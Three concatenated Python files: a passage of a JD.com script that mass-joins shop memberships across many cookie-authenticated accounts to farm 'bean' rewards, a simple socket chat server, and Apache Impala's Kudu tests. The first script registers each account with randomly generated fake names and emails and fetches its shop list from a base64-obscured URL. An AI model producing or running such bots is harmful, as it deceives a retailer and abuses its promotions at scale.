    :param userName: account nickname (logging)
    :param user_num: 1-based account index; only account 1 prints details
    :return: (activityId, beanCount) when the shop qualifies, else one of
             (0, 0) no beans / (0, status) too few beans /
             (1, 1) already a member / (2, 2) record-only mode.
             On an unexpected error prints it and returns None implicitly
             (callers unpack inside a try block).
    """
    num1 = string.digits
    # Random 5-digit suffix for the jsonp callback name.
    v_num1 = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
        random.sample(num1, 4))
    url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=getShopOpenCardInfo&body=%7B%22venderId%22%3A%22{2}%22%2C%22channel%22%3A406%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{0}_{1}'.format(
        timestamp, v_num1, venderId)
    resp = requests.get(url=url, verify=False, headers=headers, timeout=60)
    time.sleep(sleepNum)
    resulttxt = resp.text
    # Strip the jsonp_..(...); wrapper to get the JSON payload.
    r = re.compile(r'jsonp_.*?\((.*?)\)\;', re.M | re.S | re.I)
    result = r.findall(resulttxt)
    cardInfo = json.loads(result[0])
    venderCardName = cardInfo['result']['shopMemberCardInfo']['venderCardName']  # shop card name
    if user_num == 1:
        printinfo(f"\t└查询入会礼包【{venderCardName}】", printlog)
    openCardStatus = cardInfo['result']['userInfo']['openCardStatus']  # membership status
    interestsRuleList = cardInfo['result']['interestsRuleList']
    if interestsRuleList == None:
        # No gift list at all -> no beans, skip joining.
        if user_num == 1:
            printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
        return 0, 0
    try:
        if len(interestsRuleList) > 0:
            for i in interestsRuleList:
                if "京豆" in i['prizeName']:
                    getBean = int(i['discountString'])
                    activityId = i['interestsInfo']['activityId']
                    context = "{0}".format(shopid)
                    # Record every bean-awarding shop id, regardless of threshold.
                    outfile(f"shopid-{today}.txt", context, False)
                    in_url = 'https://shop.m.jd.com/?shopId={}'.format(shopid)
                    url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
                    context = "[{0}]:入会{2}豆店铺【{1}】\n\t加入会员:{4}\n\t解绑会员:{3}".format(nowtime(), venderCardName, getBean,
                                                                                url, in_url)
                    if user_num == 1:
                        outfile("入会汇总.txt", context, False)
                    if getBean >= openCardBean:  # does the award meet the configured threshold?
                        print(f"\t└账号{user_num}【{userName}】{venderCardName}:入会赠送【{getBean}豆】,可入会")
                        context = "{0}".format(shopid)
                        outfile(f"入会{openCardBean}豆以上的shopid-{today}.txt", context, False)
                        if onlyRecord == True:
                            # Record-only mode: log but never join.
                            if user_num == 1:
                                print("已开启仅记录,不入会。")
                            return 2, 2
                        if openCardStatus == 1:
                            # Already a member: point the user at the unbind URL.
                            url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
                            print("\t\t└[账号:{0}]:您已经是本店会员,请注销会员卡24小时后再来~\n注销链接:{1}".format(userName, url))
                            context = "[{3}]:入会{1}豆,{0}销卡:{2}".format(venderCardName, getBean, url, nowtime())
                            outfile("可退会账号【{0}】.txt".format(userName), context, False)
                            return 1, 1
                        return activityId, getBean
                    else:
                        if user_num == 1:
                            print(f'\t\t└{venderCardName}:入会送【{getBean}】豆少于【{openCardBean}豆】,不入...')
                        if onlyRecord == True:
                            if user_num == 1:
                                print("已开启仅记录,不入会。")
                            return 2, 2
                        return 0, openCardStatus
                else:
                    pass
            # Loop completed without finding a bean prize.
            if user_num == 1:
                printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
            return 0, 0
        else:
            return 0, 0
    except Exception as e:
        # NOTE(review): this prints and falls through returning None, which
        # callers only survive because they unpack inside their own try.
        print(e)
# 开卡
def bindWithVender(venderId, shopId, activityId, channel, headers):
    """Enrol the account as a shop member via the jsonp bind endpoint.

    :param venderId: vendor id
    :param shopId: shop id
    :param activityId: gift activity id from getShopOpenCardInfo()
    :param channel: numeric channel code (callers pass 208)
    :param headers: 'JDApp' header set carrying the account cookie
    :return: raw jsonp response text, or None when the request failed
             (the error is printed, matching the script's style)
    """
    alphabet = string.ascii_letters + string.digits
    digits = string.digits
    # Randomized registration details so each bind looks distinct.
    fake_name = ''.join(random.sample(alphabet, 10))
    jsonp_id = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
        random.sample(digits, 4))
    fake_mail = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
        random.sample(digits, 8)) + "@qq.com"
    url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=bindWithVender&body=%7B%22venderId%22%3A%22{4}%22%2C%22shopId%22%3A%22{7}%22%2C%22bindByVerifyCodeFlag%22%3A1%2C%22registerExtend%22%3A%7B%22v_sex%22%3A%22%E6%9C%AA%E7%9F%A5%22%2C%22v_name%22%3A%22{0}%22%2C%22v_birthday%22%3A%221990-03-18%22%2C%22v_email%22%3A%22{6}%22%7D%2C%22writeChildFlag%22%3A0%2C%22activityId%22%3A{5}%2C%22channel%22%3A{3}%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{1}_{2}'.format(
        fake_name, timestamp, jsonp_id, channel, venderId, activityId, fake_mail, shopId)
    try:
        return requests.get(url=url, verify=False, headers=headers, timeout=60).text
    except Exception as e:
        print(e)
# 获取开卡结果
def getResult(resulttxt, userName, user_num):
    """Parse a jsonp bind-card response and report the outcome.

    :param resulttxt: raw response text from bindWithVender()
    :param userName: account nickname (logging)
    :param user_num: 1-based account index (logging)
    :return: the busiCode string of the first payload ('0' on success),
             or None when the text contains no jsonp payload
    """
    payloads = re.findall(r'jsonp_.*?\((.*?)\)\;', resulttxt, re.M | re.S | re.I)
    for payload in payloads:
        data = json.loads(payload)
        busiCode = data['busiCode']
        if busiCode != '0':
            # Failure: print the server's message verbatim.
            print("\t\t└账号{0}【{1}】:{2}".format(user_num, userName, data['message']))
            return busiCode
        message = data['message']
        try:
            gifts = data['result']['giftInfo']['giftList']
            print(f"\t\t└账号{user_num}【{userName}】:{message}")
            # Enumerate the gifts that came with the membership.
            for gift in gifts:
                print("\t\t\t└{0}:{1} ".format(gift['prizeTypeName'], gift['discount']))
        except:
            # No gift list in the payload — still a success.
            print(f'\t\t└账号{user_num}【{userName}】:{message}')
        return busiCode
def getRemoteShopid():
    """Download the remote "shopid:venderid" list into the module globals.

    :return: (shopidList, venderidList); on any failure prints a notice
             and exits via exitCodeFun(999).
    """
    global shopidList, venderidList
    shopidList = []
    venderidList = []
    # List URL is base64-obfuscated (decodes to a gitee.com raw file).
    url = base64.decodebytes(
        b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvc2hvcGlkLnR4dA==")
    try:
        for line in gettext(url).split("\n"):
            if line:
                parts = line.split(':')
                shopidList.append(parts[0])
                venderidList.append(parts[1])
        return shopidList, venderidList
    except:
        print("无法从远程获取shopid")
        exitCodeFun(999)
# 读取shopid.txt
def getShopID():
    """Read shop ids from the local shopid.txt, one per line.

    :return: list of id strings (may include empty entries — callers
             filter with a length check); exits via exitCodeFun(2) when
             the file is missing or empty.
    """
    try:
        with open(pwd + "shopid.txt", "r", encoding="utf-8") as fh:
            raw = fh.read()
        if raw:
            return raw.split("\n")
        print("Error:请检查shopid.txt文件是否正常!\n")
        exitCodeFun(2)
    except Exception as e:
        print("Error:请检查shopid.txt文件是否正常!\n", e)
        exitCodeFun(2)
# 进度条
def progress_bar(start, end, threadNum):
    """Print a coarse percentage progress line for one worker thread.

    Thread 2 works on the upper half of the shop list, so its indexes are
    rebased by the module-level midNum before computing the percentage.
    """
    print("\r", end="")
    if threadNum == 2:
        pct = round((start - midNum) / (end - midNum) * 100, 2)
        print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(pct, nowtime(), threadNum))
    elif threadNum == 1:
        pct = round(start / end * 100, 2)
        print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(pct, nowtime(), threadNum))
    sys.stdout.flush()
## 多账号并发
## Per-account worker used in concurrent (multi-account) mode.
def sss(ii, ck, userName, pinName, endNum, user_num, shopids, threadNum):
    """Process one shop for one account: look up the gift, join if it
    meets the bean threshold, and record progress.

    :param ii: index into `shopids`
    :param ck: account cookie
    :param userName: account nickname (logging)
    :param pinName: account pin (memory/counter key)
    :param endNum: end index, for the progress bar
    :param user_num: 1-based account index; only account 1 prints details
    :param shopids: full shop id list
    :param threadNum: worker thread id (1 or 2)
    """
    if ii % 10 == 0 and ii != 0 and user_num == 1:
        progress_bar(ii, endNum, threadNum)
    try:
        if len(shopids[ii]) > 0:
            headers_b = setHeaders(ck, "mall")  # anonymous headers for the shop page
            if isRemoteSid:
                # Remote list already carries the vender id — no page scrape.
                venderId = venderidList[shopidList.index(shopids[ii])]
            else:
                venderId = getVenderId(shopids[ii], headers_b)
                time.sleep(sleepNum)  # optional request throttling
            # Record current position for the resume feature.
            memoryFun(ii, threadNum, True, pinName, 0, allUserCount)
            headers_a = setHeaders(ck, "mh5")
            # Returns (activityId, beans) or 0:no beans / 1:already member /
            # 2:record-only mode (see getShopOpenCardInfo).
            activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[ii], userName, user_num)
            time.sleep(sleepNum)
            if activityId == 0 or activityId == 2:
                pass
            elif activityId > 10:
                # Real activity id: actually join the membership.
                headers = setHeaders(ck, "JDApp")
                result = bindWithVender(venderId, shopids[ii], activityId, 208, headers)
                busiCode = getResult(result, userName, user_num)
                if busiCode == '0':
                    # Success: credit the beans and show the running total.
                    memoryFun(ii, threadNum, False, pinName, getBean, allUserCount)
                    memoryJson = getMemory()
                    print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
                    time.sleep(sleepNum)
            else:
                pass
    except Exception as e:
        if user_num == 1:
            print(f"【Error】:多账号并发报错,请求过快建议适当调整 sleepNum 参数限制速度 \n{e}")
# 为多线程准备
# Thread entry point: walk a slice of the shop list for all accounts.
def OpenVipCard(startNum: int, endNum: int, shopids, cookies, userNames, pinNameList, threadNum):
    """Iterate shops [startNum, endNum) and join qualifying memberships.

    In concurrent mode every account is processed in parallel per shop
    (via sss/TaskThread); otherwise accounts take turns sequentially.

    :param startNum: first shop index (inclusive)
    :param endNum: last shop index (exclusive)
    :param shopids: full shop id list
    :param cookies/userNames/pinNameList: parallel per-account lists
    :param threadNum: worker thread id (1 or 2); thread 1 prints the banner
    """
    sssLabel = 0  # ensures the mode banner is printed only once
    for i in range(startNum, endNum):
        user_num = 1
        if Concurrent:
            if sssLabel == 0 and threadNum == 1:
                if DoubleThread:
                    message("当前模式: 双线程,多账号并发运行")
                else:
                    message("当前模式: 单线程,多账号并发运行")
                sssLabel = 1
            # One worker thread per account for this shop.
            threads = []
            for ck, userName, pinName in zip(cookies, userNames, pinNameList):
                tt = TaskThread(sss, args=(i, ck, userName, pinName, endNum, user_num, shopids, threadNum))
                threads.append(tt)
                tt.start()
                user_num += 1
                time.sleep(sleepNum)
            for t in threads:
                t.join()
            time.sleep(sleepNum)
        else:
            if sssLabel == 0 and threadNum == 1:
                if DoubleThread:
                    message("当前模式: 双线程,单账号运行")
                else:
                    message("当前模式: 单线程,单账号运行")
                sssLabel = 1
            # Query the gift package only once per shop (first account),
            # then reuse the activity id for the remaining accounts.
            activityIdLabel = 0
            for ck, userName, pinName in zip(cookies, userNames, pinNameList):
                if i % 10 == 0 and i != 0:
                    progress_bar(i, endNum, threadNum)
                try:
                    if len(shopids[i]) > 0:
                        headers_b = setHeaders(ck, "mall")
                        venderId = getVenderId(shopids[i], headers_b)
                        time.sleep(sleepNum)  # optional request throttling
                        # Record current position for the resume feature.
                        memoryFun(i, threadNum, True, pinName, 0, allUserCount)
                        if activityIdLabel == 0:
                            # Probe with a randomly chosen account's cookie.
                            s = random.randint(0, allUserCount - 1)
                            headers_a = setHeaders(cookies[s], "mh5")
                            activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[i], userName,
                                                                      user_num)
                            # Returns (activityId, beans) or 0:no beans /
                            # 1:already member / 2:record-only mode.
                            time.sleep(sleepNum)
                        if activityId == 0 or activityId == 2:
                            break
                        elif activityId == 1:
                            user_num += 1
                            continue
                        elif activityId > 10:
                            activityIdLabel = 1
                            headers = setHeaders(ck, "JDApp")
                            result = bindWithVender(venderId, shopids[i], activityId, 208, headers)
                            busiCode = getResult(result, userName, user_num)
                            if busiCode == '0':
                                memoryFun(i, threadNum, False, pinName, getBean, allUserCount)
                                memoryJson = getMemory()
                                print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
                                time.sleep(sleepNum)
                            else:
                                break
                except Exception as e:
                    user_num += 1
                    print(e)
                    continue
                user_num += 1
# start
# Main workflow entry point.
def start():
    """Run the whole open-card workflow end to end.

    Loads shop ids (remote or local), validates account cookies, resumes
    from saved progress if enabled, fans the shop list out over one or
    two worker threads, and finally prints and pushes a per-account
    summary before exiting via exitCodeFun(0).
    """
    global allUserCount
    print(scriptHeader)
    outfile("Readme.md", readmes, True)
    isUpdate()
    # NOTE(review): allUserCount is declared global twice (harmless duplicate).
    global endShopidNum, midNum, allUserCount
    if isRemoteSid:
        message("已启用远程获取shopid")
        # NOTE(review): this venderidList is a local that shadows the module
        # global that getRemoteShopid() also assigns — confirm intended.
        allShopid, venderidList = getRemoteShopid()
    else:
        message("从本地shopid.txt获取shopid")
        allShopid = getShopID()
    # Dedupe; midNum splits the list between the two worker threads.
    allShopid = list(set(allShopid))
    endShopidNum = len(allShopid)
    midNum = int(endShopidNum / 2)
    message("获取到店铺数量: {}".format(endShopidNum))
    message(f"您已设置入会条件:{openCardBean} 京豆")
    print("获取账号...")
    cookies, userNames, pinNameList = iscookie()
    allUserCount = len(cookies)
    message("共{}个有效账号".format(allUserCount))
    memorylabel = 0
    startNum1 = 0
    startNum2 = midNum
    starttime = time.perf_counter()  # start timing
    if endShopidNum > 1 and DoubleThread:
        # Resume feature: restore each thread's last position if applicable.
        startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
                                                     pinNameList)
        # Two worker threads, each covering half of the shop list.
        threads = []
        t1 = Thread(target=OpenVipCard, args=(startNum1, midNum, allShopid, cookies, userNames, pinNameList, 1))
        threads.append(t1)
        t2 = Thread(target=OpenVipCard, args=(startNum2, endShopidNum, allShopid, cookies, userNames, pinNameList, 2))
        threads.append(t2)
        try:
            for t in threads:
                t.setDaemon(True)
                t.start()
            for t in threads:
                t.join()
            isSuccess = True
            progress_bar(1, 1, 1)
            progress_bar(1, 1, 2)
        except:
            isSuccess = False
    elif endShopidNum == 1 or not DoubleThread:
        # Single-threaded path: one pass over the whole list.
        startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
                                                     pinNameList)
        OpenVipCard(startNum1, endShopidNum, allShopid, cookies, userNames, pinNameList, 1)
        isSuccess = True
    else:
        message("获取到shopid数量为0")
        exitCodeFun(9)
    endtime = time.perf_counter()  # stop timing
    if os.path.exists(pwd + "log/memory.json"):
        # Summarize per-account joins and beans from the persisted counters.
        memoryJson = getMemory()
        n = 1
        message("\n###【本次统计 {}】###\n".format(nowtime()))
        all_get_bean = 0
        for name, pinname in zip(userNames, pinNameList):
            try:
                userCountBean = memoryJson['{}'.format(pinname)]
                successJoin = memoryJson['{}_ok'.format(pinname)]
                message(f"账号{n}:【{name}】\n\t└成功入会【{successJoin}】个,收获【{userCountBean}】京豆")
                all_get_bean += userCountBean
            except Exception as e:
                # No counters recorded for this account this run.
                message(f"账号{n}:【{name}】\n\t└成功入会【0】个,收获【0】京豆")
            n += 1
        message(f"\n本次总累计获得:{all_get_bean} 京豆")
        time.sleep(1)
    message("\n------- 入会总耗时 : %.03f 秒 seconds -------" % (endtime - starttime))
    print("{0}\n{1}\n{2}".format("*" * 30, scriptHeader, remarks))
    send("【JD入会领豆】", message_info)
    exitCodeFun(0)
if __name__ == '__main__':
    # Script entry point: run the full open-card workflow.
    start()
|
Server.py | import socket
import threading
# Chat-relay server configuration and shared state (module import has the
# side effect of binding and listening on the socket).
PORT = 5050
# Bind to this machine's primary address, resolved from its hostname.
SERVER = socket.gethostbyname(socket.gethostname())
FORMAT = 'ascii'  # wire encoding for control/handshake messages
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((SERVER, PORT))
server.listen()
# Parallel lists: clients[i] is the socket whose nickname is nicknames[i].
clients = []
nicknames = []
def broadcast(message):
    """Send *message* (raw bytes) to every currently connected client."""
    for peer in clients:
        peer.send(message)
def handle_client(client):
    """Per-client relay loop: forward everything this client sends to all
    connected clients, and clean up when the connection ends.

    Runs on its own thread (started in receive()).
    """
    while True:
        try:
            message = client.recv(1024)
            if not message:
                # recv() returning b'' means the peer closed the connection
                # cleanly; the original looped forever broadcasting b''.
                break
            broadcast(message)
        except Exception:
            # Narrowed from a bare `except:`, which would also swallow
            # SystemExit/KeyboardInterrupt in this thread.
            break
    # Cleanup happens on every exit path. Remove by index so the two
    # parallel lists stay aligned even with duplicate nicknames (the
    # original nicknames.remove(nickname) could drop the wrong entry).
    try:
        index = clients.index(client)
        clients.pop(index)
        nicknames.pop(index)
    except ValueError:
        pass  # already removed by another path
    client.close()
def receive():
    """Accept loop: greet each connection, register it, spawn a relay thread.

    Handshake: the server sends 'WEB' as a nickname request and takes the
    client's first message as its nickname.  Never returns.
    """
    while True:
        client, addr = server.accept()
        print(f"Connected with {str(addr)}")
        # Ask the client for its nickname.
        client.send('WEB'.encode(FORMAT))
        nickname = client.recv(1024).decode(FORMAT)
        # Keep the two parallel lists in the same order.
        nicknames.append(nickname)
        clients.append(client)
        print(f"Nickname of the client is {nickname}!")
        broadcast(f"{nickname} joined the Chat!".encode(FORMAT))
        client.send("Connected to the Server!".encode(FORMAT))
        # One relay thread per client (see handle_client).
        thread = threading.Thread(target = handle_client, args = (client,))
        thread.start()
# Module entry: announce startup, then block forever in the accept loop.
print("[STARTING] Starting the Server...")
receive()
|
test_kudu.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from kudu.schema import (
BOOL,
DOUBLE,
FLOAT,
INT16,
INT32,
INT64,
INT8,
SchemaBuilder,
STRING,
BINARY,
UNIXTIME_MICROS)
from kudu.client import Partitioning
from kudu.util import to_unixtime_micros
import logging
import pytest
import random
import re
import textwrap
import threading
import time
from datetime import datetime, date
from pytz import utc
from tests.common.environ import ImpalaTestClusterProperties, HIVE_MAJOR_VERSION
from tests.common.kudu_test_suite import KuduTestSuite
from tests.common.impala_cluster import ImpalaCluster
from tests.common.skip import SkipIfNotHdfsMinicluster, SkipIfKudu, SkipIfHive2
from tests.common.test_dimensions import (add_exec_option_dimension,
extend_exec_option_dimension)
from tests.verifiers.metric_verifier import MetricVerifier
# Kudu master address(es) supplied on the pytest command line; used by the
# suite when creating Kudu-backed tables.
KUDU_MASTER_HOSTS = pytest.config.option.kudu_master_hosts
# Cached cluster properties (local minicluster vs remote, catalog version, ...).
IMPALA_TEST_CLUSTER_PROPERTIES = ImpalaTestClusterProperties.get_instance()
LOG = logging.getLogger(__name__)
# TODO(IMPALA-8614): parameterize some tests to run with HMS integration enabled.
class TestKuduBasicDML(KuduTestSuite):
  """
  This suite tests the basic DML operations when using a kudu table.
  """
  @classmethod
  def add_test_dimensions(cls):
    super(TestKuduBasicDML, cls).add_test_dimensions()
    # The default read mode of READ_LATEST does not provide high enough consistency for
    # these tests.
    add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")
    # Run with and without multithreading to ensure Kudu DML works with both threading
    # models. E.g. see IMPALA-9782.
    add_exec_option_dimension(cls, "mt_dop", "0")
    extend_exec_option_dimension(cls, "mt_dop", "4")

  # Each test below replays a canned .test workload against a database
  # private to the test; hybrid-clock-less clusters are skipped because
  # READ_AT_SNAPSHOT requires one.
  @SkipIfKudu.no_hybrid_clock
  def test_kudu_insert(self, vector, unique_database):
    self.run_test_case('QueryTest/kudu_insert', vector, use_db=unique_database)

  @SkipIfKudu.no_hybrid_clock
  def test_kudu_update(self, vector, unique_database):
    self.run_test_case('QueryTest/kudu_update', vector, use_db=unique_database)

  @SkipIfKudu.no_hybrid_clock
  def test_kudu_upsert(self, vector, unique_database):
    self.run_test_case('QueryTest/kudu_upsert', vector, use_db=unique_database)

  @SkipIfKudu.no_hybrid_clock
  def test_kudu_delete(self, vector, unique_database):
    self.run_test_case('QueryTest/kudu_delete', vector, use_db=unique_database)
# TODO(IMPALA-8614): parameterize some tests to run with HMS integration enabled.
class TestKuduOperations(KuduTestSuite):
"""
This suite tests the different modification operations when using a kudu table.
"""
  @classmethod
  def add_test_dimensions(cls):
    # Extend the inherited dimensions with a stricter read mode.
    super(TestKuduOperations, cls).add_test_dimensions()
    # The default read mode of READ_LATEST does not provide high enough consistency for
    # these tests.
    add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")
  @SkipIfKudu.no_hybrid_clock
  @SkipIfKudu.hms_integration_enabled
  def test_out_of_range_timestamps(self, vector, cursor, kudu_client, unique_database):
    """Test timestamp values that are outside of Impala's supported date range."""
    cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
    cursor.execute("""CREATE TABLE %s.times (a INT PRIMARY KEY, ts TIMESTAMP)
        PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
    assert kudu_client.table_exists(
        KuduTestSuite.to_kudu_table_name(unique_database, "times"))

    # Insert rows directly through the Kudu client so values Impala would
    # reject can reach the table.
    table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "times"))
    session = kudu_client.new_session()
    session.apply(table.new_insert((0, datetime(1987, 5, 19, 0, 0, tzinfo=utc))))
    # Add a date before 1400
    session.apply(table.new_insert((1, datetime(1300, 1, 1, 0, 0, tzinfo=utc))))
    # TODO: Add a date after 9999. There isn't a way to represent a date greater than
    # 9999 in Python datetime.
    #session.apply(table.new_insert((2, datetime(12000, 1, 1, 0, 0, tzinfo=utc))))
    session.flush()

    # Pin the snapshot so the scan sees the rows just flushed.
    cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
                   to_unixtime_micros(kudu_client.latest_observed_timestamp()))
    # TODO: The test driver should have a way to specify query options in an 'options'
    # section rather than having to split abort_on_error cases into separate files.
    vector.get_value('exec_option')['abort_on_error'] = 0
    self.run_test_case('QueryTest/kudu-overflow-ts', vector,
                       use_db=unique_database)
    vector.get_value('exec_option')['abort_on_error'] = 1
    self.run_test_case('QueryTest/kudu-overflow-ts-abort-on-error', vector,
                       use_db=unique_database)
  @SkipIfKudu.no_hybrid_clock
  def test_kudu_scan_node(self, vector, unique_database):
    # Scan-node coverage via the canned kudu-scan-node workload.
    self.run_test_case('QueryTest/kudu-scan-node', vector, use_db=unique_database)
  @SkipIfNotHdfsMinicluster.tuned_for_minicluster
  @SkipIfKudu.no_hybrid_clock
  def test_kudu_insert_mem_limit(self, vector, unique_database):
    # Mem-limit behavior during INSERT; expectations assume minicluster tuning.
    self.run_test_case('QueryTest/kudu_insert_mem_limit', vector, use_db=unique_database)
  @SkipIfKudu.no_hybrid_clock
  def test_kudu_partition_ddl(self, vector, unique_database):
    # DDL coverage for Kudu partitioning clauses.
    self.run_test_case('QueryTest/kudu_partition_ddl', vector, use_db=unique_database)
  @pytest.mark.skipif(IMPALA_TEST_CLUSTER_PROPERTIES.is_remote_cluster(),
                      reason="Test references hardcoded hostnames: IMPALA-4873")
  @pytest.mark.execute_serially
  @SkipIfKudu.no_hybrid_clock
  @SkipIfKudu.hms_integration_enabled
  def test_kudu_alter_table(self, vector, unique_database):
    # ALTER TABLE coverage; serial because it touches cluster-wide state.
    self.run_test_case('QueryTest/kudu_alter', vector, use_db=unique_database)
  @SkipIfKudu.no_hybrid_clock
  def test_kudu_stats(self, vector, unique_database):
    # COMPUTE/SHOW STATS coverage for Kudu tables.
    self.run_test_case('QueryTest/kudu_stats', vector, use_db=unique_database)
  @SkipIfKudu.no_hybrid_clock
  def test_kudu_describe(self, vector, unique_database):
    # DESCRIBE output coverage for Kudu tables.
    self.run_test_case('QueryTest/kudu_describe', vector, use_db=unique_database)
  @SkipIfKudu.no_hybrid_clock
  def test_kudu_limit(self, vector, unique_database):
    # LIMIT pushdown/behavior coverage for Kudu scans.
    self.run_test_case('QueryTest/kudu_limit', vector, use_db=unique_database)
def test_kudu_column_options(self, cursor, kudu_client, unique_database):
"""Test Kudu column options"""
encodings = ["ENCODING PLAIN_ENCODING", ""]
compressions = ["COMPRESSION SNAPPY", ""]
nullability = ["NOT NULL", "NULL", ""]
defaults = ["DEFAULT 1", ""]
blocksizes = ["BLOCK_SIZE 32768", ""]
indx = 1
for encoding in encodings:
for compression in compressions:
for default in defaults:
for blocksize in blocksizes:
for nullable in nullability:
impala_tbl_name = "test_column_options_%s" % str(indx)
cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY
%s %s %s %s, b INT %s %s %s %s %s) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name,
encoding, compression, default, blocksize, nullable, encoding,
compression, default, blocksize))
indx = indx + 1
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name))
  def test_kudu_col_changed(
      self, cursor, kudu_client, unique_database, cluster_properties):
    """Test changing a Kudu column outside of Impala results in a failure on read with
    outdated metadata (IMPALA-4828)."""
    cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
    cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
        PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
    assert kudu_client.table_exists(
        KuduTestSuite.to_kudu_table_name(unique_database, "foo"))

    # Force metadata to be loaded on impalads
    cursor.execute("select * from %s.foo" % (unique_database))

    # Load the table via the Kudu client and change col 's' to be a different type.
    table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
    alterer = kudu_client.new_table_alterer(table)
    alterer.drop_column("s")
    table = alterer.alter()
    alterer = kudu_client.new_table_alterer(table)
    alterer.add_column("s", "int32")
    table = alterer.alter()

    # Add some rows
    session = kudu_client.new_session()
    for i in range(100):
      op = table.new_insert((i, i))
      session.apply(op)
    session.flush()

    # Pin the snapshot so the scan sees the rows just flushed.
    cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
                   to_unixtime_micros(kudu_client.latest_observed_timestamp()))

    # Scanning should result in an error with Catalog V1, since the metadata is cached.
    try:
      cursor.execute("SELECT * FROM %s.foo" % (unique_database))
      assert cluster_properties.is_catalog_v2_cluster(),\
          "Should fail with Catalog V1, which caches metadata"
    except Exception as e:
      assert not cluster_properties.is_catalog_v2_cluster(),\
          "Should succeed with Catalog V2, which does not cache metadata"
      expected_error = "Column 's' is type INT but Impala expected STRING. The table "\
          "metadata in Impala may be outdated and need to be refreshed."
      assert expected_error in str(e)

    # After a REFRESH the scan should succeed
    cursor.execute("REFRESH %s.foo" % (unique_database))
    cursor.execute("SELECT * FROM %s.foo" % (unique_database))
    assert len(cursor.fetchall()) == 100
  def test_kudu_col_not_null_changed(
      self, cursor, kudu_client, unique_database, cluster_properties):
    """Test changing a NOT NULL Kudu column outside of Impala results in a failure
    on read with outdated metadata (IMPALA-4828)."""
    cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
    cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NOT NULL)
        PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
    assert kudu_client.table_exists(
        KuduTestSuite.to_kudu_table_name(unique_database, "foo"))

    # Force metadata to be loaded on impalads
    cursor.execute("select * from %s.foo" % (unique_database))

    # Load the table via the Kudu client and re-create col 's' as nullable.
    table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
    alterer = kudu_client.new_table_alterer(table)
    alterer.drop_column("s")
    table = alterer.alter()
    alterer = kudu_client.new_table_alterer(table)
    alterer.add_column("s", "string", nullable=True)
    table = alterer.alter()

    # Add some rows with NULL in 's' — legal now, but not per Impala's cache.
    session = kudu_client.new_session()
    for i in range(100):
      op = table.new_insert((i, None))
      session.apply(op)
    session.flush()

    # Pin the snapshot so the scan sees the rows just flushed.
    cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
                   to_unixtime_micros(kudu_client.latest_observed_timestamp()))

    # Scanning should result in an error
    try:
      cursor.execute("SELECT * FROM %s.foo" % (unique_database))
      assert cluster_properties.is_catalog_v2_cluster(),\
          "Should fail with Catalog V1, which caches metadata"
    except Exception as e:
      assert not cluster_properties.is_catalog_v2_cluster(),\
          "Should succeed with Catalog V2, which does not cache metadata"
      expected_error = "Column 's' is nullable but Impala expected it to be "\
          "not nullable. The table metadata in Impala may be outdated and need to be "\
          "refreshed."
      assert expected_error in str(e)

    # After a REFRESH the scan should succeed
    cursor.execute("REFRESH %s.foo" % (unique_database))
    cursor.execute("SELECT * FROM %s.foo" % (unique_database))
    assert len(cursor.fetchall()) == 100
  def test_kudu_col_null_changed(
      self, cursor, kudu_client, unique_database, cluster_properties):
    """Test changing a NULL Kudu column outside of Impala results in a failure
